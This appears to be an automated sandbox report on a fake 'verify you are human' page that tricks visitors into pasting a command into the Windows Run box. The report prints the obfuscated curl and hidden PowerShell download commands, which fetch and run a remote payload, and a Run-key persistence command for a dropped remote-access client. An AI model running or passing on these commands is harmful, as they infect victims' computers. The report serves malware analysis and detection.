Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.69:443 -> 192.168.2.17:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.27:443 -> 192.168.2.17:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.42.254:443 -> 192.168.2.17:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49787 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.140.48.131:443 -> 192.168.2.17:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.3.254:443 -> 192.168.2.17:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.113.155.207:443 -> 192.168.2.17:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.111.208.110:443 -> 192.168.2.17:49794 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.206.121.228:443 -> 192.168.2.17:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.204.88.70:443 -> 192.168.2.17:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.150.240.254:443 -> 192.168.2.17:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.17:49804 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\System32\osk.exe Windows user hook set: Path: unknown Event Start:focus Event End: focus Module: NULL
Source: C:\Windows\System32\osk.exe Windows user hook set: 0 keyboard low level C:\Windows\system32\osk.exe
Source: C:\Windows\System32\osk.exe Windows user hook set: 4568 call wnd proc C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 4568 get message C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 0 shell C:\Windows\system32\OskSupport.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 0 mouse low level C:\Windows\system32\osk.exe
Source: C:\Windows\System32\osk.exe Windows user hook set: 4572 call wnd proc C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 4572 get message C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 4284 call wnd proc C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 4284 get message C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 6740 call wnd proc C:\Windows\System32\uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Windows user hook set: 6740 get message C:\Windows\System32\uiautomationcore.dll
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard, 37_2_1101F6B0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11032EE0 GetClipboardFormatNameA,SetClipboardData, 37_2_11032EE0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree, 37_2_110321E0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor, 37_2_110076F0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState, 37_2_11113880
Source: Yara match File source: 37.2.client32.exe.111b79e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000025.00000002.2428248444.0000000011193000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Options\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA, 37_2_111158B0

System Summary

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\PCICHEK.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\pcicapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\jkosfe\vpnclient2.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\PCICL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\client32.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\remcmdstub.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\rgakat\vpnclient2.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11115750: GetModuleFileNameA,GetShortPathNameA,CreateFileA,CreateFileA,CreateFileA,DeviceIoControl,CloseHandle, 37_2_11115750
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec, 37_2_1115DB40
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 37_2_1102D330
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.evad.win@57/404@120/19
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11059C50 GetLastError,FormatMessageA,LocalFree, 37_2_11059C50
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges, 37_2_1109D440
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1109D4D0 AdjustTokenPrivileges,CloseHandle, 37_2_1109D4D0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize, 37_2_11115B70
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11089150 FindResourceA,LoadResource,LockResource, 37_2_11089150
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError, 37_2_11127E10
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Mutant created: NULL
Source: C:\Windows\System32\osk.exe Mutant created: \Sessions\1\BaseNamedObjects\OSKRunning
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3584:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gz3rpg3v.cj5.ps1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,
Source: chrome.exe, 00000000.00000002.2473488281.000028EC02ABE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:3
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://fountainofhealth.ca"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8
Source: unknown Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,
Source: unknown Process created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
Source: unknown Process created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Options\client32.exe "C:\Users\user\AppData\Roaming\Options\client32.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f
Source: C:\Windows\System32\osk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{29CE1D46-B481-4AA0-A08A-D3EBC8ACA402}\InProcServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Roaming\Options\NSM.ini
Source: C:\Windows\System32\rundll32.exe Window found: window name: SysTabControl32
Source: C:\Users\user\AppData\Roaming\Options\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Options\msvcr100.dll
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF100000.00000004.00000800.00020000.00000000.sdmp, client32.exe
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: C:\Program Files (x86)\iTop VPN\vpnclient2.pdb7 source: powershell.exe, 00000022.00000002.1908768239.0000028FCF283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF1F9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000025.00000002.2412047042.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF157000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Program Files (x86)\iTop VPN\vpnclient2.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF1F9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')"
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11145440 _memset,GetVersionExA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDefaultLangID, 37_2_11145440
Source: PCICL32.DLL.34.dr Static PE information: section name: .hhshare
Source: msvcr100.dll.34.dr Static PE information: section name: .text entropy: 6.909044922675825

Persistence and Installation Behavior

Source: Chrome DOM: 0.2 OCR Text: fountainofhealth.ca Verify you are human by completing the action below O Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps use keyboard To prove you are not robot 1, Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3, Press Enter key on your keyboard Ray 10: 8ed10zeshpn Performance and security by Cloudflare
Source: screenshot OCR Text: e about:blank -8 x Home Fountain of Health X fountainofhealth.ca/en o x Keyboard Properties Speed Hardware Character repeat Repeat delay .ca Long Short completing the action below Repeat rate: Slow Fast 5 Click here and hold down a keyto test repeat rate: view the security of your connection before proceeding. Cursor blink rate Fast None Complete these verification steps Lise keyboard To prove you are not robot Bopiy Canc 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 8ed10zeshpn Performance and security by Cloudflare 11:05 ENG p Type here to search SG 2/05/2025
Source: screenshot OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 8ed10zeshpn Performance and security by Cloudflare 11:05 ENG p Type here to search SG 2/05/2025
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Clipboard modification: C:\WINDOWS\system32\conhost.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Ent
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\PCICHEK.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\pcicapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\jkosfe\vpnclient2.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\PCICL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\client32.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\remcmdstub.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\rgakat\vpnclient2.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC97030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod, 37_2_6CC97030
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC85490 GetPrivateProfileIntA, 37_2_6CC85490
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC850E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA, 37_2_6CC850E0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError, 37_2_11127E10
Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Support11
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary, 37_2_11139090
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows, 37_2_1115B1D0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt, 37_2_11113290
